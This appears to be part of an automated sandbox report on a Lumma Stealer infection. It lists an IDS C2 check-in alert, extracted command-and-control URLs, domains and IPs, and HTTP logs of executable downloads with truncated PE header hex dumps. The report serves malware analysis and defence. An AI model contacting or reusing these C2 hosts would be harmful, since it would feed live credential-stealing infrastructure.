Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50052 -> 104.21.95.91:443
Source: Malware configuration extractor URLs: http://185.215.113.206/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: crisiwarny.store
Source: Malware configuration extractor URLs: scriptyprefej.store
Source: Malware configuration extractor URLs: navygenerayk.store
Source: Malware configuration extractor URLs: necklacedmny.store
Source: Malware configuration extractor URLs: presticitpo.store
Source: Malware configuration extractor URLs: thumbystriw.store
Source: Malware configuration extractor URLs: fadehairucw.store
Source: Malware configuration extractor URLs: founpiuer.store
Source: Malware configuration extractor IPs: 185.215.113.43
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:54:22 GMTContent-Type: application/octet-streamContent-Length: 1887744Last-Modified: Sat, 26 Oct 2024 03:45:05 GMTConnection: keep-aliveETag: "671c65c1-1cce00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4a 00 00 04 00 00 86 06 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 93 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 92 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 
90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6a 74 61 79 69 72 62 00 c0 19 00 00 e0 30 00 00 b4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6d 6e 6f 77 62 6f 75 00 10 00 00 00 a0 4a 00 00 04 00 00 00 a8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 ac 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 26 Oct 2024 03:54:33 GMT
Content-Type: application/octet-stream
Content-Length: 1834496
Last-Modified: Sat, 26 Oct 2024 03:44:58 GMT
Connection: keep-alive
ETag: "671c65ba-1bfe00"
Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 26 Oct 2024 03:54:45 GMT
Content-Type: application/octet-stream
Content-Length: 2831360
Last-Modified: Sat, 26 Oct 2024 03:26:14 GMT
Connection: keep-alive
ETag: "671c6156-2b3400"
Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
Date: Sat, 26 Oct 2024 03:54:50 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
ETag: "10e436-5e7ec6832a180"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
Date: Sat, 26 Oct 2024 03:55:01 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "a7550-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 685392
Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
Date: Sat, 26 Oct 2024 03:55:06 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "94750-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 608080
Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
Date: Sat, 26 Oct 2024 03:55:09 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6dde8-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 450024
Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 26 Oct 2024 03:55:09 GMT
Content-Type: application/octet-stream
Content-Length: 2949120
Last-Modified: Sat, 26 Oct 2024 03:44:52 GMT
Connection: keep-alive
ETag: "671c65b4-2d0000"
Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
Date: Sat, 26 Oct 2024 03:55:12 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "1f3950-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 2046288
Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
Date: Sat, 26 Oct 2024 03:55:23 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "3ef50-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 257872
Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
Date: Sat, 26 Oct 2024 03:55:25 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "13bf0-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 80880
Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 26 Oct 2024 03:55:30 GMT
Content-Type: application/octet-stream
Content-Length: 1834496
Last-Modified: Sat, 26 Oct 2024 03:44:58 GMT
Connection: keep-alive
ETag: "671c65ba-1bfe00"
Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:55:45 GMTContent-Type: application/octet-streamContent-Length: 919040Last-Modified: Sat, 26 Oct 2024 03:25:48 GMTConnection: keep-aliveETag: "671c613c-e0600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 34 61 1c 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 56 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 a0 41 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 f4 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 9b 00 00 00 40 0d 00 00 9c 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 90 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:55:48 GMTContent-Type: application/octet-streamContent-Length: 1887744Last-Modified: Sat, 26 Oct 2024 03:45:05 GMTConnection: keep-aliveETag: "671c65c1-1cce00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4a 00 00 04 00 00 86 06 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 93 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 92 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 
90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6a 74 61 79 69 72 62 00 c0 19 00 00 e0 30 00 00 b4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6d 6e 6f 77 62 6f 75 00 10 00 00 00 a0 4a 00 00 04 00 00 00 a8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 ac 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:55:55 GMTContent-Type: application/octet-streamContent-Length: 314368Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTConnection: keep-aliveETag: "66f90daa-4cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 f0 69 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 aa 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 25 00 e0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8f cc 01 00 00 10 00 00 00 ce 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 8c cf 00 00 00 e0 01 00 00 d0 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 
00 00 00 a4 03 23 00 00 b0 02 00 00 e4 01 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9e 45 00 00 00 c0 25 00 00 46 00 00 00 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:56:00 GMTContent-Type: application/octet-streamContent-Length: 1834496Last-Modified: Sat, 26 Oct 2024 03:44:58 GMTConnection: keep-aliveETag: "671c65ba-1bfe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 39 24 1c 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 20 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 69 00 00 04 00 00 fa 70 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 
61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 68 65 62 78 79 7a 72 00 a0 19 00 00 70 4f 00 00 9c 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 7a 61 79 65 78 74 71 00 10 00 00 00 10 69 00 00 04 00 00 00 d8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 69 00 00 22 00 00 00 dc 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:56:02 GMTContent-Type: application/octet-streamContent-Length: 1887744Last-Modified: Sat, 26 Oct 2024 03:45:05 GMTConnection: keep-aliveETag: "671c65c1-1cce00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4a 00 00 04 00 00 86 06 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 93 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 92 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 
90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6a 74 61 79 69 72 62 00 c0 19 00 00 e0 30 00 00 b4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6d 6e 6f 77 62 6f 75 00 10 00 00 00 a0 4a 00 00 04 00 00 00 a8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 ac 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
